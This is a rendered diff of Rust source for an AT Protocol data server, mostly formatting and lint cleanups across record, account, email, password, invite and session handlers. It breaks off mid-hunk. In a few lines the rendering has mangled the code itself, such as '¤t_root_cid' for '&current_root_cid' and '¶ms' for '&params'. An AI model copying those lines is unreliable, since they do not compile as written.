uri: format!("at://{}/{}/{}", did, input.collection, rkey),
236
-
cid: record_cid.to_string(),
237
-
})).into_response()
311
+
(
312
+
StatusCode::OK,
313
+
Json(CreateRecordOutput {
314
+
uri: format!("at://{}/{}/{}", did, input.collection, rkey),
315
+
cid: record_cid.to_string(),
316
+
}),
317
+
)
318
+
.into_response()
238
319
}
239
320
#[derive(Deserialize)]
240
321
#[allow(dead_code)]
···
265
346
Ok(res) => res,
266
347
Err(err_res) => return err_res,
267
348
};
268
-
if let Some(swap_commit) = &input.swap_commit {
269
-
if Cid::from_str(swap_commit).ok() != Some(current_root_cid) {
270
-
return (StatusCode::CONFLICT, Json(json!({"error": "InvalidSwap", "message": "Repo has been modified"}))).into_response();
349
+
if let Some(swap_commit) = &input.swap_commit
350
+
&& Cid::from_str(swap_commit).ok() != Some(current_root_cid) {
351
+
return (
352
+
StatusCode::CONFLICT,
353
+
Json(json!({"error": "InvalidSwap", "message": "Repo has been modified"})),
354
+
)
355
+
.into_response();
271
356
}
272
-
}
273
357
let tracking_store = TrackingBlockStore::new(state.block_store.clone());
274
358
let commit_bytes = match tracking_store.get(¤t_root_cid).await {
275
359
Ok(Some(b)) => b,
276
-
_ => return (StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError", "message": "Commit block not found"}))).into_response(),
360
+
_ => {
361
+
return (
362
+
StatusCode::INTERNAL_SERVER_ERROR,
363
+
Json(json!({"error": "InternalError", "message": "Commit block not found"})),
364
+
)
365
+
.into_response();
366
+
}
277
367
};
278
368
let commit = match Commit::from_cbor(&commit_bytes) {
279
369
Ok(c) => c,
280
-
_ => return (StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError", "message": "Failed to parse commit"}))).into_response(),
370
+
_ => {
371
+
return (
372
+
StatusCode::INTERNAL_SERVER_ERROR,
373
+
Json(json!({"error": "InternalError", "message": "Failed to parse commit"})),
374
+
)
375
+
.into_response();
376
+
}
281
377
};
282
-
let mst = Mst::load(
283
-
Arc::new(tracking_store.clone()),
284
-
commit.data,
285
-
None,
286
-
);
378
+
let mst = Mst::load(Arc::new(tracking_store.clone()), commit.data, None);
287
379
let collection_nsid = match input.collection.parse::<Nsid>() {
288
380
Ok(n) => n,
289
-
Err(_) => return (StatusCode::BAD_REQUEST, Json(json!({"error": "InvalidCollection"}))).into_response(),
381
+
Err(_) => {
382
+
return (
383
+
StatusCode::BAD_REQUEST,
384
+
Json(json!({"error": "InvalidCollection"})),
385
+
)
386
+
.into_response();
387
+
}
290
388
};
291
389
let key = format!("{}/{}", collection_nsid, input.rkey);
292
-
if input.validate.unwrap_or(true) {
293
-
if let Err(err_response) = validate_record(&input.record, &input.collection) {
294
-
return err_response;
390
+
if input.validate.unwrap_or(true)
391
+
&& let Err(err_response) = validate_record(&input.record, &input.collection) {
392
+
return *err_response;
295
393
}
296
-
}
297
394
if let Some(swap_record_str) = &input.swap_record {
298
395
let expected_cid = Cid::from_str(swap_record_str).ok();
299
396
let actual_cid = mst.get(&key).await.ok().flatten();
···
304
401
let existing_cid = mst.get(&key).await.ok().flatten();
305
402
let mut record_bytes = Vec::new();
306
403
if serde_ipld_dagcbor::to_writer(&mut record_bytes, &input.record).is_err() {
307
-
return (StatusCode::BAD_REQUEST, Json(json!({"error": "InvalidRecord", "message": "Failed to serialize record"}))).into_response();
404
+
return (
405
+
StatusCode::BAD_REQUEST,
406
+
Json(json!({"error": "InvalidRecord", "message": "Failed to serialize record"})),
407
+
)
408
+
.into_response();
308
409
}
309
410
let record_cid = match tracking_store.put(&record_bytes).await {
310
411
Ok(c) => c,
311
-
_ => return (StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError", "message": "Failed to save record block"}))).into_response(),
412
+
_ => {
413
+
return (
414
+
StatusCode::INTERNAL_SERVER_ERROR,
415
+
Json(json!({"error": "InternalError", "message": "Failed to save record block"})),
416
+
)
417
+
.into_response();
418
+
}
312
419
};
313
420
let new_mst = if existing_cid.is_some() {
314
421
match mst.update(&key, record_cid).await {
315
422
Ok(m) => m,
316
-
Err(_) => return (StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError", "message": "Failed to update MST"}))).into_response(),
423
+
Err(_) => {
424
+
return (
425
+
StatusCode::INTERNAL_SERVER_ERROR,
426
+
Json(json!({"error": "InternalError", "message": "Failed to update MST"})),
427
+
)
428
+
.into_response();
429
+
}
317
430
}
318
431
} else {
319
432
match mst.add(&key, record_cid).await {
320
433
Ok(m) => m,
321
-
Err(_) => return (StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError", "message": "Failed to add to MST"}))).into_response(),
434
+
Err(_) => {
435
+
return (
436
+
StatusCode::INTERNAL_SERVER_ERROR,
437
+
Json(json!({"error": "InternalError", "message": "Failed to add to MST"})),
438
+
)
439
+
.into_response();
440
+
}
322
441
}
323
442
};
324
443
let new_mst_root = match new_mst.persist().await {
325
444
Ok(c) => c,
326
-
Err(_) => return (StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError", "message": "Failed to persist MST"}))).into_response(),
445
+
Err(_) => {
446
+
return (
447
+
StatusCode::INTERNAL_SERVER_ERROR,
448
+
Json(json!({"error": "InternalError", "message": "Failed to persist MST"})),
449
+
)
450
+
.into_response();
451
+
}
327
452
};
328
453
let op = if existing_cid.is_some() {
329
-
RecordOp::Update { collection: input.collection.clone(), rkey: input.rkey.clone(), cid: record_cid, prev: existing_cid }
454
+
RecordOp::Update {
455
+
collection: input.collection.clone(),
456
+
rkey: input.rkey.clone(),
457
+
cid: record_cid,
458
+
prev: existing_cid,
459
+
}
330
460
} else {
331
-
RecordOp::Create { collection: input.collection.clone(), rkey: input.rkey.clone(), cid: record_cid }
461
+
RecordOp::Create {
462
+
collection: input.collection.clone(),
463
+
rkey: input.rkey.clone(),
464
+
cid: record_cid,
465
+
}
332
466
};
333
467
let mut relevant_blocks = std::collections::BTreeMap::new();
334
-
if let Err(_) = new_mst.blocks_for_path(&key, &mut relevant_blocks).await {
468
+
if new_mst.blocks_for_path(&key, &mut relevant_blocks).await.is_err() {
335
469
return (StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError", "message": "Failed to get new MST blocks for path"}))).into_response();
336
470
}
337
-
if let Err(_) = mst.blocks_for_path(&key, &mut relevant_blocks).await {
471
+
if mst.blocks_for_path(&key, &mut relevant_blocks).await.is_err() {
338
472
return (StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError", "message": "Failed to get old MST blocks for path"}))).into_response();
339
473
}
340
474
relevant_blocks.insert(record_cid, bytes::Bytes::from(record_bytes));
···
344
478
written_cids.push(*cid);
345
479
}
346
480
}
347
-
let written_cids_str = written_cids.iter().map(|c| c.to_string()).collect::<Vec<_>>();
348
-
if let Err(e) = commit_and_log(&state, &did, user_id, Some(current_root_cid), Some(commit.data), new_mst_root, vec![op], &written_cids_str).await {
349
-
return (StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError", "message": e}))).into_response();
481
+
let written_cids_str = written_cids
482
+
.iter()
483
+
.map(|c| c.to_string())
484
+
.collect::<Vec<_>>();
485
+
if let Err(e) = commit_and_log(
486
+
&state,
487
+
CommitParams {
488
+
did: &did,
489
+
user_id,
490
+
current_root_cid: Some(current_root_cid),
491
+
prev_data_cid: Some(commit.data),
492
+
new_mst_root,
493
+
ops: vec![op],
494
+
blocks_cids: &written_cids_str,
495
+
},
496
+
)
497
+
.await
498
+
{
499
+
return (
500
+
StatusCode::INTERNAL_SERVER_ERROR,
501
+
Json(json!({"error": "InternalError", "message": e})),
502
+
)
503
+
.into_response();
350
504
};
351
-
(StatusCode::OK, Json(PutRecordOutput {
352
-
uri: format!("at://{}/{}/{}", did, input.collection, input.rkey),
353
-
cid: record_cid.to_string(),
354
-
})).into_response()
505
+
(
506
+
StatusCode::OK,
507
+
Json(PutRecordOutput {
508
+
uri: format!("at://{}/{}/{}", did, input.collection, input.rkey),
509
+
cid: record_cid.to_string(),
510
+
}),
511
+
)
512
+
.into_response()
355
513
}
+67
-34
src/api/server/account_status.rs
+67
-34
src/api/server/account_status.rs
···
32
32
headers: axum::http::HeaderMap,
33
33
) -> Response {
34
34
let extracted = match crate::auth::extract_auth_token_from_header(
35
-
headers.get("Authorization").and_then(|h| h.to_str().ok())
35
+
headers.get("Authorization").and_then(|h| h.to_str().ok()),
36
36
) {
37
37
Some(t) => t,
38
38
None => return ApiError::AuthenticationRequired.into_response(),
39
39
};
40
40
let dpop_proof = headers.get("DPoP").and_then(|h| h.to_str().ok());
41
-
let http_uri = format!("https://{}/xrpc/com.atproto.server.checkAccountStatus",
42
-
std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string()));
41
+
let http_uri = format!(
42
+
"https://{}/xrpc/com.atproto.server.checkAccountStatus",
43
+
std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string())
44
+
);
43
45
let did = match crate::auth::validate_token_with_dpop(
44
46
&state.db,
45
47
&extracted.token,
···
48
50
"GET",
49
51
&http_uri,
50
52
true,
51
-
).await {
53
+
)
54
+
.await
55
+
{
52
56
Ok(user) => user.did,
53
57
Err(e) => return ApiError::from(e).into_response(),
54
58
};
···
72
76
Ok(Some(row)) => row.deactivated_at,
73
77
_ => None,
74
78
};
75
-
let repo_result = sqlx::query!("SELECT repo_root_cid FROM repos WHERE user_id = $1", user_id)
76
-
.fetch_optional(&state.db)
77
-
.await;
79
+
let repo_result = sqlx::query!(
80
+
"SELECT repo_root_cid FROM repos WHERE user_id = $1",
81
+
user_id
82
+
)
83
+
.fetch_optional(&state.db)
84
+
.await;
78
85
let repo_commit = match repo_result {
79
86
Ok(Some(row)) => row.repo_root_cid,
80
87
_ => String::new(),
81
88
};
82
-
let record_count: i64 = sqlx::query_scalar!("SELECT COUNT(*) FROM records WHERE repo_id = $1", user_id)
83
-
.fetch_one(&state.db)
84
-
.await
85
-
.unwrap_or(Some(0))
86
-
.unwrap_or(0);
87
-
let blob_count: i64 =
88
-
sqlx::query_scalar!("SELECT COUNT(*) FROM blobs WHERE created_by_user = $1", user_id)
89
+
let record_count: i64 =
90
+
sqlx::query_scalar!("SELECT COUNT(*) FROM records WHERE repo_id = $1", user_id)
89
91
.fetch_one(&state.db)
90
92
.await
91
93
.unwrap_or(Some(0))
92
94
.unwrap_or(0);
95
+
let blob_count: i64 = sqlx::query_scalar!(
96
+
"SELECT COUNT(*) FROM blobs WHERE created_by_user = $1",
97
+
user_id
98
+
)
99
+
.fetch_one(&state.db)
100
+
.await
101
+
.unwrap_or(Some(0))
102
+
.unwrap_or(0);
93
103
let valid_did = did.starts_with("did:");
94
104
(
95
105
StatusCode::OK,
···
113
123
headers: axum::http::HeaderMap,
114
124
) -> Response {
115
125
let extracted = match crate::auth::extract_auth_token_from_header(
116
-
headers.get("Authorization").and_then(|h| h.to_str().ok())
126
+
headers.get("Authorization").and_then(|h| h.to_str().ok()),
117
127
) {
118
128
Some(t) => t,
119
129
None => return ApiError::AuthenticationRequired.into_response(),
120
130
};
121
131
let dpop_proof = headers.get("DPoP").and_then(|h| h.to_str().ok());
122
-
let http_uri = format!("https://{}/xrpc/com.atproto.server.activateAccount",
123
-
std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string()));
132
+
let http_uri = format!(
133
+
"https://{}/xrpc/com.atproto.server.activateAccount",
134
+
std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string())
135
+
);
124
136
let did = match crate::auth::validate_token_with_dpop(
125
137
&state.db,
126
138
&extracted.token,
···
129
141
"POST",
130
142
&http_uri,
131
143
true,
132
-
).await {
144
+
)
145
+
.await
146
+
{
133
147
Ok(user) => user.did,
134
148
Err(e) => return ApiError::from(e).into_response(),
135
149
};
···
171
185
Json(_input): Json<DeactivateAccountInput>,
172
186
) -> Response {
173
187
let extracted = match crate::auth::extract_auth_token_from_header(
174
-
headers.get("Authorization").and_then(|h| h.to_str().ok())
188
+
headers.get("Authorization").and_then(|h| h.to_str().ok()),
175
189
) {
176
190
Some(t) => t,
177
191
None => return ApiError::AuthenticationRequired.into_response(),
178
192
};
179
193
let dpop_proof = headers.get("DPoP").and_then(|h| h.to_str().ok());
180
-
let http_uri = format!("https://{}/xrpc/com.atproto.server.deactivateAccount",
181
-
std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string()));
194
+
let http_uri = format!(
195
+
"https://{}/xrpc/com.atproto.server.deactivateAccount",
196
+
std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string())
197
+
);
182
198
let did = match crate::auth::validate_token_with_dpop(
183
199
&state.db,
184
200
&extracted.token,
···
187
203
"POST",
188
204
&http_uri,
189
205
false,
190
-
).await {
206
+
)
207
+
.await
208
+
{
191
209
Ok(user) => user.did,
192
210
Err(e) => return ApiError::from(e).into_response(),
193
211
};
···
196
214
.await
197
215
.ok()
198
216
.flatten();
199
-
let result = sqlx::query!("UPDATE users SET deactivated_at = NOW() WHERE did = $1", did)
200
-
.execute(&state.db)
201
-
.await;
217
+
let result = sqlx::query!(
218
+
"UPDATE users SET deactivated_at = NOW() WHERE did = $1",
219
+
did
220
+
)
221
+
.execute(&state.db)
222
+
.await;
202
223
match result {
203
224
Ok(_) => {
204
225
if let Some(h) = handle {
···
222
243
headers: axum::http::HeaderMap,
223
244
) -> Response {
224
245
let extracted = match crate::auth::extract_auth_token_from_header(
225
-
headers.get("Authorization").and_then(|h| h.to_str().ok())
246
+
headers.get("Authorization").and_then(|h| h.to_str().ok()),
226
247
) {
227
248
Some(t) => t,
228
249
None => return ApiError::AuthenticationRequired.into_response(),
229
250
};
230
251
let dpop_proof = headers.get("DPoP").and_then(|h| h.to_str().ok());
231
-
let http_uri = format!("https://{}/xrpc/com.atproto.server.requestAccountDelete",
232
-
std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string()));
252
+
let http_uri = format!(
253
+
"https://{}/xrpc/com.atproto.server.requestAccountDelete",
254
+
std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string())
255
+
);
233
256
let did = match crate::auth::validate_token_with_dpop(
234
257
&state.db,
235
258
&extracted.token,
···
238
261
"POST",
239
262
&http_uri,
240
263
true,
241
-
).await {
264
+
)
265
+
.await
266
+
{
242
267
Ok(user) => user.did,
243
268
Err(e) => return ApiError::from(e).into_response(),
244
269
};
···
274
299
.into_response();
275
300
}
276
301
let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string());
277
-
if let Err(e) =
278
-
crate::notifications::enqueue_account_deletion(&state.db, user_id, &confirmation_token, &hostname).await
302
+
if let Err(e) = crate::notifications::enqueue_account_deletion(
303
+
&state.db,
304
+
user_id,
305
+
&confirmation_token,
306
+
&hostname,
307
+
)
308
+
.await
279
309
{
280
310
warn!("Failed to enqueue account deletion notification: {:?}", e);
281
311
}
···
395
425
.into_response();
396
426
}
397
427
if Utc::now() > expires_at {
398
-
let _ = sqlx::query!("DELETE FROM account_deletion_requests WHERE token = $1", token)
399
-
.execute(&state.db)
400
-
.await;
428
+
let _ = sqlx::query!(
429
+
"DELETE FROM account_deletion_requests WHERE token = $1",
430
+
token
431
+
)
432
+
.execute(&state.db)
433
+
.await;
401
434
return (
402
435
StatusCode::BAD_REQUEST,
403
436
Json(json!({"error": "ExpiredToken", "message": "Token has expired"})),
+6
-2
src/api/server/app_password.rs
+6
-2
src/api/server/app_password.rs
···
80
80
Json(input): Json<CreateAppPasswordInput>,
81
81
) -> Response {
82
82
let client_ip = crate::rate_limit::extract_client_ip(&headers, None);
83
-
if !state.check_rate_limit(RateLimitKind::AppPassword, &client_ip).await {
83
+
if !state
84
+
.check_rate_limit(RateLimitKind::AppPassword, &client_ip)
85
+
.await
86
+
{
84
87
warn!(ip = %client_ip, "App password creation rate limit exceeded");
85
88
return (
86
89
axum::http::StatusCode::TOO_MANY_REQUESTS,
···
88
91
"error": "RateLimitExceeded",
89
92
"message": "Too many requests. Please try again later."
90
93
})),
91
-
).into_response();
94
+
)
95
+
.into_response();
92
96
}
93
97
let user_id = match get_user_id_by_did(&state.db, &auth_user.did).await {
94
98
Ok(id) => id,
+37
-30
src/api/server/email.rs
+37
-30
src/api/server/email.rs
···
27
27
Json(input): Json<RequestEmailUpdateInput>,
28
28
) -> Response {
29
29
let client_ip = crate::rate_limit::extract_client_ip(&headers, None);
30
-
if !state.check_rate_limit(RateLimitKind::EmailUpdate, &client_ip).await {
30
+
if !state
31
+
.check_rate_limit(RateLimitKind::EmailUpdate, &client_ip)
32
+
.await
33
+
{
31
34
warn!(ip = %client_ip, "Email update rate limit exceeded");
32
35
return (
33
36
StatusCode::TOO_MANY_REQUESTS,
···
35
38
"error": "RateLimitExceeded",
36
39
"message": "Too many requests. Please try again later."
37
40
})),
38
-
).into_response();
41
+
)
42
+
.into_response();
39
43
}
40
44
let token = match crate::auth::extract_bearer_token_from_header(
41
-
headers.get("Authorization").and_then(|h| h.to_str().ok())
45
+
headers.get("Authorization").and_then(|h| h.to_str().ok()),
42
46
) {
43
47
Some(t) => t,
44
48
None => {
···
108
112
}
109
113
let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string());
110
114
if let Err(e) = crate::notifications::enqueue_email_update(
111
-
&state.db,
112
-
user_id,
113
-
&email,
114
-
&handle,
115
-
&code,
116
-
&hostname,
115
+
&state.db, user_id, &email, &handle, &code, &hostname,
117
116
)
118
117
.await
119
118
{
···
136
135
Json(input): Json<ConfirmEmailInput>,
137
136
) -> Response {
138
137
let client_ip = crate::rate_limit::extract_client_ip(&headers, None);
139
-
if !state.check_rate_limit(RateLimitKind::AppPassword, &client_ip).await {
138
+
if !state
139
+
.check_rate_limit(RateLimitKind::AppPassword, &client_ip)
140
+
.await
141
+
{
140
142
warn!(ip = %client_ip, "Confirm email rate limit exceeded");
141
143
return (
142
144
StatusCode::TOO_MANY_REQUESTS,
···
144
146
"error": "RateLimitExceeded",
145
147
"message": "Too many requests. Please try again later."
146
148
})),
147
-
).into_response();
149
+
)
150
+
.into_response();
148
151
}
149
152
let token = match crate::auth::extract_bearer_token_from_header(
150
-
headers.get("Authorization").and_then(|h| h.to_str().ok())
153
+
headers.get("Authorization").and_then(|h| h.to_str().ok()),
151
154
) {
152
155
Some(t) => t,
153
156
None => {
···
185
188
let email_pending_verification = user.email_pending_verification;
186
189
let email = input.email.trim().to_lowercase();
187
190
let confirmation_code = input.token.trim();
188
-
let (pending_email, saved_code, expiry) = match (email_pending_verification, stored_code, expires_at) {
189
-
(Some(p), Some(c), Some(e)) => (p, c, e),
190
-
_ => {
191
-
return (
191
+
let (pending_email, saved_code, expiry) =
192
+
match (email_pending_verification, stored_code, expires_at) {
193
+
(Some(p), Some(c), Some(e)) => (p, c, e),
194
+
_ => {
195
+
return (
192
196
StatusCode::BAD_REQUEST,
193
-
Json(json!({"error": "InvalidRequest", "message": "No pending email update found"})),
197
+
Json(
198
+
json!({"error": "InvalidRequest", "message": "No pending email update found"}),
199
+
),
194
200
)
195
201
.into_response();
196
-
}
197
-
};
202
+
}
203
+
};
198
204
if pending_email != email {
199
205
return (
200
206
StatusCode::BAD_REQUEST,
···
203
209
.into_response();
204
210
}
205
211
if saved_code != confirmation_code {
206
-
return (
212
+
return (
207
213
StatusCode::BAD_REQUEST,
208
214
Json(json!({"error": "InvalidToken", "message": "Invalid token"})),
209
215
)
···
225
231
.await;
226
232
if let Err(e) = update {
227
233
error!("DB error finalizing email update: {:?}", e);
228
-
if e.as_database_error().map(|db_err| db_err.is_unique_violation()).unwrap_or(false) {
229
-
return (
234
+
if e.as_database_error()
235
+
.map(|db_err| db_err.is_unique_violation())
236
+
.unwrap_or(false)
237
+
{
238
+
return (
230
239
StatusCode::BAD_REQUEST,
231
240
Json(json!({"error": "EmailTaken", "message": "Email already taken"})),
232
241
)
233
242
.into_response();
234
-
}
243
+
}
235
244
return (
236
245
StatusCode::INTERNAL_SERVER_ERROR,
237
246
Json(json!({"error": "InternalError"})),
···
257
266
Json(input): Json<UpdateEmailInput>,
258
267
) -> Response {
259
268
let token = match crate::auth::extract_bearer_token_from_header(
260
-
headers.get("Authorization").and_then(|h| h.to_str().ok())
269
+
headers.get("Authorization").and_then(|h| h.to_str().ok()),
261
270
) {
262
271
Some(t) => t,
263
272
None => {
···
302
311
)
303
312
.into_response();
304
313
}
305
-
if let Some(ref current) = current_email {
306
-
if new_email == current.to_lowercase() {
314
+
if let Some(ref current) = current_email
315
+
&& new_email == current.to_lowercase() {
307
316
return (StatusCode::OK, Json(json!({}))).into_response();
308
317
}
309
-
}
310
318
let email_confirmed = stored_code.is_some() && email_pending_verification.is_some();
311
319
if email_confirmed {
312
320
let confirmation_token = match &input.token {
···
353
361
)
354
362
.into_response();
355
363
}
356
-
if let Some(exp) = expires_at {
357
-
if Utc::now() > exp {
364
+
if let Some(exp) = expires_at
365
+
&& Utc::now() > exp {
358
366
return (
359
367
StatusCode::BAD_REQUEST,
360
368
Json(json!({"error": "ExpiredToken", "message": "Token has expired"})),
361
369
)
362
370
.into_response();
363
371
}
364
-
}
365
372
}
366
373
let exists = sqlx::query!(
367
374
"SELECT 1 as one FROM users WHERE LOWER(email) = $1 AND id != $2",
+16
-12
src/api/server/invite.rs
+16
-12
src/api/server/invite.rs
···
143
143
});
144
144
} else {
145
145
for account_did in for_accounts {
146
-
let target_user_id = match sqlx::query!("SELECT id FROM users WHERE did = $1", account_did)
147
-
.fetch_optional(&state.db)
148
-
.await
149
-
{
150
-
Ok(Some(row)) => row.id,
151
-
Ok(None) => continue,
152
-
Err(e) => {
153
-
error!("DB error looking up target account: {:?}", e);
154
-
return ApiError::InternalError.into_response();
155
-
}
156
-
};
146
+
let target_user_id =
147
+
match sqlx::query!("SELECT id FROM users WHERE did = $1", account_did)
148
+
.fetch_optional(&state.db)
149
+
.await
150
+
{
151
+
Ok(Some(row)) => row.id,
152
+
Ok(None) => continue,
153
+
Err(e) => {
154
+
error!("DB error looking up target account: {:?}", e);
155
+
return ApiError::InternalError.into_response();
156
+
}
157
+
};
157
158
let mut codes = Vec::new();
158
159
for _ in 0..code_count {
159
160
let code = Uuid::new_v4().to_string();
···
177
178
});
178
179
}
179
180
}
180
-
Json(CreateInviteCodesOutput { codes: result_codes }).into_response()
181
+
Json(CreateInviteCodesOutput {
182
+
codes: result_codes,
183
+
})
184
+
.into_response()
181
185
}
182
186
183
187
#[derive(Deserialize)]
+4
-1
src/api/server/mod.rs
+4
-1
src/api/server/mod.rs
···
18
18
pub use meta::{describe_server, health, robots_txt};
19
19
pub use password::{request_password_reset, reset_password};
20
20
pub use service_auth::get_service_auth;
21
-
pub use session::{confirm_signup, create_session, delete_session, get_session, refresh_session, resend_verification};
21
+
pub use session::{
22
+
confirm_signup, create_session, delete_session, get_session, refresh_session,
23
+
resend_verification,
24
+
};
22
25
pub use signing_key::reserve_signing_key;
+27
-20
src/api/server/password.rs
+27
-20
src/api/server/password.rs
···
5
5
http::{HeaderMap, StatusCode},
6
6
response::{IntoResponse, Response},
7
7
};
8
-
use bcrypt::{hash, DEFAULT_COST};
8
+
use bcrypt::{DEFAULT_COST, hash};
9
9
use chrono::{Duration, Utc};
10
10
use serde::Deserialize;
11
11
use serde_json::json;
···
15
15
crate::util::generate_token_code()
16
16
}
17
17
fn extract_client_ip(headers: &HeaderMap) -> String {
18
-
if let Some(forwarded) = headers.get("x-forwarded-for") {
19
-
if let Ok(value) = forwarded.to_str() {
20
-
if let Some(first_ip) = value.split(',').next() {
18
+
if let Some(forwarded) = headers.get("x-forwarded-for")
19
+
&& let Ok(value) = forwarded.to_str()
20
+
&& let Some(first_ip) = value.split(',').next() {
21
21
return first_ip.trim().to_string();
22
22
}
23
-
}
24
-
}
25
-
if let Some(real_ip) = headers.get("x-real-ip") {
26
-
if let Ok(value) = real_ip.to_str() {
23
+
if let Some(real_ip) = headers.get("x-real-ip")
24
+
&& let Ok(value) = real_ip.to_str() {
27
25
return value.trim().to_string();
28
26
}
29
-
}
30
27
"unknown".to_string()
31
28
}
32
29
···
41
38
Json(input): Json<RequestPasswordResetInput>,
42
39
) -> Response {
43
40
let client_ip = extract_client_ip(&headers);
44
-
if !state.check_rate_limit(RateLimitKind::PasswordReset, &client_ip).await {
41
+
if !state
42
+
.check_rate_limit(RateLimitKind::PasswordReset, &client_ip)
43
+
.await
44
+
{
45
45
warn!(ip = %client_ip, "Password reset rate limit exceeded");
46
46
return (
47
47
StatusCode::TOO_MANY_REQUESTS,
···
118
118
Json(input): Json<ResetPasswordInput>,
119
119
) -> Response {
120
120
let client_ip = extract_client_ip(&headers);
121
-
if !state.check_rate_limit(RateLimitKind::ResetPassword, &client_ip).await {
121
+
if !state
122
+
.check_rate_limit(RateLimitKind::ResetPassword, &client_ip)
123
+
.await
124
+
{
122
125
warn!(ip = %client_ip, "Reset password rate limit exceeded");
123
126
return (
124
127
StatusCode::TOO_MANY_REQUESTS,
···
126
129
"error": "RateLimitExceeded",
127
130
"message": "Too many requests. Please try again later."
128
131
})),
129
-
).into_response();
132
+
)
133
+
.into_response();
130
134
}
131
135
let token = input.token.trim();
132
136
let password = &input.password;
···
232
236
)
233
237
.into_response();
234
238
}
235
-
let user_did = match sqlx::query_scalar!(
236
-
"SELECT did FROM users WHERE id = $1",
237
-
user_id
238
-
)
239
-
.fetch_one(&mut *tx)
240
-
.await
239
+
let user_did = match sqlx::query_scalar!("SELECT did FROM users WHERE id = $1", user_id)
240
+
.fetch_one(&mut *tx)
241
+
.await
241
242
{
242
243
Ok(did) => did,
243
244
Err(e) => {
···
266
267
.execute(&mut *tx)
267
268
.await
268
269
{
269
-
error!("Failed to invalidate sessions after password reset: {:?}", e);
270
+
error!(
271
+
"Failed to invalidate sessions after password reset: {:?}",
272
+
e
273
+
);
270
274
return (
271
275
StatusCode::INTERNAL_SERVER_ERROR,
272
276
Json(json!({"error": "InternalError"})),
···
284
288
for jti in session_jtis {
285
289
let cache_key = format!("auth:session:{}:{}", user_did, jti);
286
290
if let Err(e) = state.cache.delete(&cache_key).await {
287
-
warn!("Failed to invalidate session cache for {}: {:?}", cache_key, e);
291
+
warn!(
292
+
"Failed to invalidate session cache for {}: {:?}",
293
+
cache_key, e
294
+
);
288
295
}
289
296
}
290
297
info!("Password reset completed for user {}", user_id);
+25
-14
src/api/server/service_auth.rs
+25
-14
src/api/server/service_auth.rs
···
28
28
Query(params): Query<GetServiceAuthParams>,
29
29
) -> Response {
30
30
let token = match crate::auth::extract_bearer_token_from_header(
31
-
headers.get("Authorization").and_then(|h| h.to_str().ok())
31
+
headers.get("Authorization").and_then(|h| h.to_str().ok()),
32
32
) {
33
33
Some(t) => t,
34
34
None => return ApiError::AuthenticationRequired.into_response(),
···
39
39
};
40
40
let key_bytes = match auth_user.key_bytes {
41
41
Some(kb) => kb,
42
-
None => return ApiError::AuthenticationFailedMsg("OAuth tokens cannot create service auth".into()).into_response(),
43
-
};
44
-
let lxm = params.lxm.as_deref().unwrap_or("*");
45
-
let service_token = match crate::auth::create_service_token(&auth_user.did, ¶ms.aud, lxm, &key_bytes)
46
-
{
47
-
Ok(t) => t,
48
-
Err(e) => {
49
-
error!("Failed to create service token: {:?}", e);
50
-
return (
51
-
StatusCode::INTERNAL_SERVER_ERROR,
52
-
Json(json!({"error": "InternalError"})),
42
+
None => {
43
+
return ApiError::AuthenticationFailedMsg(
44
+
"OAuth tokens cannot create service auth".into(),
53
45
)
54
-
.into_response();
46
+
.into_response();
55
47
}
56
48
};
57
-
(StatusCode::OK, Json(GetServiceAuthOutput { token: service_token })).into_response()
49
+
let lxm = params.lxm.as_deref().unwrap_or("*");
50
+
let service_token =
51
+
match crate::auth::create_service_token(&auth_user.did, ¶ms.aud, lxm, &key_bytes) {
52
+
Ok(t) => t,
53
+
Err(e) => {
54
+
error!("Failed to create service token: {:?}", e);
55
+
return (
56
+
StatusCode::INTERNAL_SERVER_ERROR,
57
+
Json(json!({"error": "InternalError"})),
58
+
)
59
+
.into_response();
60
+
}
61
+
};
62
+
(
63
+
StatusCode::OK,
64
+
Json(GetServiceAuthOutput {
65
+
token: service_token,
66
+
}),
67
+
)
68
+
.into_response()
58
69
}
+92
-60
src/api/server/session.rs
+92
-60
src/api/server/session.rs
···
14
14
use tracing::{error, info, warn};
15
15
16
16
fn extract_client_ip(headers: &HeaderMap) -> String {
17
-
if let Some(forwarded) = headers.get("x-forwarded-for") {
18
-
if let Ok(value) = forwarded.to_str() {
19
-
if let Some(first_ip) = value.split(',').next() {
17
+
if let Some(forwarded) = headers.get("x-forwarded-for")
18
+
&& let Ok(value) = forwarded.to_str()
19
+
&& let Some(first_ip) = value.split(',').next() {
20
20
return first_ip.trim().to_string();
21
21
}
22
-
}
23
-
}
24
-
if let Some(real_ip) = headers.get("x-real-ip") {
25
-
if let Ok(value) = real_ip.to_str() {
22
+
if let Some(real_ip) = headers.get("x-real-ip")
23
+
&& let Ok(value) = real_ip.to_str() {
26
24
return value.trim().to_string();
27
25
}
28
-
}
29
26
"unknown".to_string()
30
27
}
31
28
···
60
57
) -> Response {
61
58
info!("create_session called");
62
59
let client_ip = extract_client_ip(&headers);
63
-
if !state.check_rate_limit(RateLimitKind::Login, &client_ip).await {
60
+
if !state
61
+
.check_rate_limit(RateLimitKind::Login, &client_ip)
62
+
.await
63
+
{
64
64
warn!(ip = %client_ip, "Login rate limit exceeded");
65
65
return (
66
66
StatusCode::TOO_MANY_REQUESTS,
···
88
88
{
89
89
Ok(Some(row)) => row,
90
90
Ok(None) => {
91
-
